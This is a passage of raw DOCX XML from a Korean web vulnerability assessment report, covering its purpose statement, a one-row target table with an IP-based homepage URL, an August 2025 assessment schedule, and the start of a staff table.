        <w:t>서비스에 대하여 취약점 체크리스트를 기반으로 주요</w:t>
      </w:r>
      <w:r w:rsidR="00576DC2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004B7F5D">
        <w:t>정보의 전자적 침해 행위에 대한 취약점을 분석</w:t>
      </w:r>
      <w:r w:rsidRPr="004B7F5D">
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
        </w:rPr>
        <w:t>ᆞ</w:t>
      </w:r>
      <w:r w:rsidRPr="004B7F5D">
        <w:rPr>
          <w:rFonts w:cs="맑은 고딕" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>평가하고</w:t>
      </w:r>
      <w:r w:rsidRPr="004B7F5D">
        <w:t xml:space="preserve">, 존재하는 위협 요소에 대해 정확한 분석을 통해 보안대책을 </w:t>
      </w:r>
      <w:r w:rsidR="00106D62">
        <w:t>수립</w:t>
      </w:r>
      <w:r w:rsidR="00106D62">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 및</w:t>
      </w:r>
      <w:r w:rsidRPr="004B7F5D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A2099C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">취약점을 제거하여 </w:t>
      </w:r>
      <w:r w:rsidRPr="004B7F5D">
        <w:t>보안 위협을 최소화함으로써 사고 예방 및 안전한 운영에 기여하고자 합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB9A99D" w14:textId="77777777" w:rsidR="00934334" w:rsidRDefault="00934334" w:rsidP="009E4926">
      <w:pPr>
        <w:pStyle w:val="Level2TitleCtl2"/>
        <w:ind w:left="426" w:hanging="425"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc479668185"/>
      <w:bookmarkStart w:id="14" w:name="_Toc479668228"/>
      <w:bookmarkStart w:id="15" w:name="_Toc479668427"/>
      <w:bookmarkStart w:id="16" w:name="_Toc479669581"/>
      <w:bookmarkStart w:id="17" w:name="_Toc206601951"/>
      <w:bookmarkStart w:id="18" w:name="_Toc209094540"/>
      <w:bookmarkStart w:id="19" w:name="_Toc479668186"/>
      <w:bookmarkStart w:id="20" w:name="_Toc479668229"/>
      <w:bookmarkStart w:id="21" w:name="_Toc479668428"/>
      <w:bookmarkStart w:id="22" w:name="_Toc479669582"/>
      <w:r w:rsidRPr="00104D75">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>진단 대상</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
      <w:bookmarkEnd w:id="14"/>
      <w:bookmarkEnd w:id="15"/>
      <w:bookmarkEnd w:id="16"/>
      <w:bookmarkEnd w:id="17"/>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a5"/>
        <w:tblW w:w="9072" w:type="dxa"/>
        <w:tblInd w:w="534" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="708"/>
        <w:gridCol w:w="5954"/>
        <w:gridCol w:w="2410"/>
      </w:tblGrid>
      <w:tr w:rsidR="00934334" w:rsidRPr="00324C06" w14:paraId="50D56C6C" w14:textId="77777777" w:rsidTr="0016533F">
        <w:trPr>
          <w:trHeight w:val="425"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="double" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="09ACC727" w14:textId="77777777" w:rsidR="00934334" w:rsidRPr="00D811DC" w:rsidRDefault="00934334" w:rsidP="00386271">
            <w:pPr>
              <w:pStyle w:val="TitleCtSht"/>
              <w:wordWrap/>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D811DC">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5954" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="double" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4460D1D9" w14:textId="77777777" w:rsidR="00934334" w:rsidRPr="00D811DC" w:rsidRDefault="00934334" w:rsidP="00386271">
            <w:pPr>
              <w:pStyle w:val="TitleCtSht"/>
              <w:wordWrap/>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D811DC">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="double" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="515F51E4" w14:textId="77777777" w:rsidR="00934334" w:rsidRPr="00D811DC" w:rsidRDefault="00A62CC3" w:rsidP="004A3596">
            <w:pPr>
              <w:pStyle w:val="TitleCtSht"/>
              <w:wordWrap/>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>서비스명</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F973D4" w:rsidRPr="00104D75" w14:paraId="42370479" w14:textId="77777777" w:rsidTr="0016533F">
        <w:trPr>
          <w:trHeight w:val="425"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="double" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="26AD47D9" w14:textId="4D52A97C" w:rsidR="00F973D4" w:rsidRPr="00A402F7" w:rsidRDefault="00F973D4" w:rsidP="00F973D4">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00C82255">
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5954" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="60AA16CA" w14:textId="75AA6556" w:rsidR="00F973D4" w:rsidRDefault="00F973D4" w:rsidP="00F973D4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="굴림"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C82255">
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>h</w:t>
            </w:r>
            <w:r w:rsidRPr="00C82255">
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>ttp://43.203.87.232</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="78391DBE" w14:textId="24FE9D23" w:rsidR="00F973D4" w:rsidRDefault="00F973D4" w:rsidP="00F973D4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="굴림"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C82255">
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>홈페이지</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="36F7B5FF" w14:textId="1FF15CDB" w:rsidR="00934334" w:rsidRDefault="00934334" w:rsidP="003324FA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:wordWrap/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc206630340"/>
      <w:bookmarkStart w:id="24" w:name="_Toc206630478"/>
      <w:bookmarkStart w:id="25" w:name="_Toc209094665"/>
      <w:r>
        <w:t xml:space="preserve">[표]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1</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>진단</w:t>
      </w:r>
      <w:r w:rsidR="00D60E2D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>대상</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
      <w:bookmarkEnd w:id="24"/>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="580DDA77" w14:textId="77777777" w:rsidR="005D30D0" w:rsidRDefault="005D30D0" w:rsidP="009E4926">
      <w:pPr>
        <w:pStyle w:val="Level2TitleCtl2"/>
        <w:ind w:left="426" w:hanging="425"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc206601952"/>
      <w:bookmarkStart w:id="27" w:name="_Toc209094541"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>진단 일정</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
      <w:bookmarkEnd w:id="20"/>
      <w:bookmarkEnd w:id="21"/>
      <w:bookmarkEnd w:id="22"/>
      <w:bookmarkEnd w:id="26"/>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a5"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="534" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4423"/>
        <w:gridCol w:w="4661"/>
      </w:tblGrid>
      <w:tr w:rsidR="005D30D0" w14:paraId="456D3B51" w14:textId="77777777" w:rsidTr="0016533F">
        <w:trPr>
          <w:trHeight w:val="425"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4423" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="double" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2682F77A" w14:textId="77777777" w:rsidR="005D30D0" w:rsidRPr="00383492" w:rsidRDefault="005D30D0" w:rsidP="003324FA">
            <w:pPr>
              <w:pStyle w:val="TitleCtSht"/>
              <w:wordWrap/>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00383492">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">업무 </w:t>
            </w:r>
            <w:r w:rsidRPr="00383492">
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">수행 </w:t>
            </w:r>
            <w:r w:rsidRPr="00383492">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>내역</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4661" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="double" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="095CBA8C" w14:textId="77777777" w:rsidR="005D30D0" w:rsidRPr="00383492" w:rsidRDefault="005D30D0" w:rsidP="003324FA">
            <w:pPr>
              <w:pStyle w:val="TitleCtSht"/>
              <w:wordWrap/>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00383492">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>일정</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A00A5" w14:paraId="3D7BAFB2" w14:textId="77777777" w:rsidTr="00813E75">
        <w:trPr>
          <w:trHeight w:val="425"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4423" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="double" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0A895D95" w14:textId="12F97579" w:rsidR="008A00A5" w:rsidRPr="00FF2CCC" w:rsidRDefault="008A00A5" w:rsidP="008A00A5">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00D92242">
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>사전</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D92242">
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>준비 및 대상 관련 자료 수령</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4661" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="double" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="52D7D7B9" w14:textId="43A3AAE6" w:rsidR="008A00A5" w:rsidRPr="001A3CDF" w:rsidRDefault="008A00A5" w:rsidP="008A00A5">
            <w:pPr>
              <w:wordWrap/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>2025.08.01 ~ 2025.08.09</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A00A5" w14:paraId="7603E64B" w14:textId="77777777" w:rsidTr="00813E75">
        <w:trPr>
          <w:trHeight w:val="425"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4423" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4D101130" w14:textId="087DEFCA" w:rsidR="008A00A5" w:rsidRPr="00FF2CCC" w:rsidRDefault="008A00A5" w:rsidP="008A00A5">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">취약점진단 </w:t>
            </w:r>
            <w:r w:rsidRPr="00D92242">
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>수행</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4661" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7C7029E3" w14:textId="46522701" w:rsidR="008A00A5" w:rsidRPr="001A3CDF" w:rsidRDefault="008A00A5" w:rsidP="008A00A5">
            <w:pPr>
              <w:wordWrap/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>2025.08.11 ~ 2025.08.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A00A5" w14:paraId="16E4FE78" w14:textId="77777777" w:rsidTr="00813E75">
        <w:trPr>
          <w:trHeight w:val="425"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4423" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0EA6BCC4" w14:textId="6ABB878A" w:rsidR="008A00A5" w:rsidRPr="00FF2CCC" w:rsidRDefault="008A00A5" w:rsidP="008A00A5">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00D92242">
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>결과 분석 및 결과 보고서 작성</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4661" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2DA465E0" w14:textId="511F5253" w:rsidR="008A00A5" w:rsidRPr="001A3CDF" w:rsidRDefault="008A00A5" w:rsidP="008A00A5">
            <w:pPr>
              <w:wordWrap/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>2025.08.21 ~ 2025.08.25</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A00A5" w14:paraId="7EAE602C" w14:textId="77777777" w:rsidTr="00813E75">
        <w:trPr>
          <w:trHeight w:val="425"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4423" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6A030EFE" w14:textId="65F98B38" w:rsidR="008A00A5" w:rsidRDefault="008A00A5" w:rsidP="008A00A5">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00D92242">
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>보고서 최종 수정 및 완료</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4661" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="12631878" w14:textId="32BE8FEE" w:rsidR="008A00A5" w:rsidRDefault="008A00A5" w:rsidP="008A00A5">
            <w:pPr>
              <w:wordWrap/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>2025.08.25 (종료)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="02AC7B1D" w14:textId="095C3597" w:rsidR="005D30D0" w:rsidRPr="00E5339A" w:rsidRDefault="005D30D0" w:rsidP="003324FA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:wordWrap/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc206630341"/>
      <w:bookmarkStart w:id="29" w:name="_Toc206630479"/>
      <w:bookmarkStart w:id="30" w:name="_Toc209094666"/>
      <w:r>
        <w:t xml:space="preserve">[표]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2</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>진단 일정</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
      <w:bookmarkEnd w:id="29"/>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w14:paraId="2DFBB638" w14:textId="77777777" w:rsidR="005D30D0" w:rsidRDefault="005D30D0" w:rsidP="009E4926">
      <w:pPr>
        <w:pStyle w:val="Level2TitleCtl2"/>
        <w:ind w:left="426" w:hanging="425"/>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc479668187"/>
      <w:bookmarkStart w:id="32" w:name="_Toc479668230"/>
      <w:bookmarkStart w:id="33" w:name="_Toc479668429"/>
      <w:bookmarkStart w:id="34" w:name="_Toc479669583"/>
      <w:bookmarkStart w:id="35" w:name="_Toc206601953"/>
      <w:bookmarkStart w:id="36" w:name="_Toc209094542"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>진단 인력</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
      <w:bookmarkEnd w:id="32"/>
      <w:bookmarkEnd w:id="33"/>
      <w:bookmarkEnd w:id="34"/>
      <w:bookmarkEnd w:id="35"/>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a5"/>
        <w:tblW w:w="9100" w:type="dxa"/>
        <w:tblInd w:w="534" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2125"/>
        <w:gridCol w:w="2017"/>
        <w:gridCol w:w="1972"/>
        <w:gridCol w:w="2986"/>
      </w:tblGrid>
      <w:tr w:rsidR="00383492" w14:paraId="06BBBF06" w14:textId="77777777" w:rsidTr="0016533F">
        <w:trPr>
          <w:trHeight w:val="425"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2296" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="double" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2C8A3C0B" w14:textId="77777777" w:rsidR="00383492" w:rsidRPr="00383492" w:rsidRDefault="00383492" w:rsidP="00386271">
            <w:pPr>
              <w:pStyle w:val="TitleCtSht"/>
              <w:wordWrap/>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00383492">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>이름</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2122" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="double" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4E2E373B" w14:textId="77777777" w:rsidR="00383492" w:rsidRPr="00383492" w:rsidRDefault="00383492" w:rsidP="00386271">
            <w:pPr>
              <w:pStyle w:val="TitleCtSht"/>
              <w:wordWrap/>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00383492">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>수행업무</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2123" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="double" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5E09A5FA" w14:textId="77777777" w:rsidR="00383492" w:rsidRPr="00383492" w:rsidRDefault="00383492" w:rsidP="00386271">
            <w:pPr>
              <w:pStyle w:val="TitleCtSht"/>
              <w:wordWrap/>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>연락처</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2559" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="double" w:sz="4" w:space="0" w:color="auto"/>
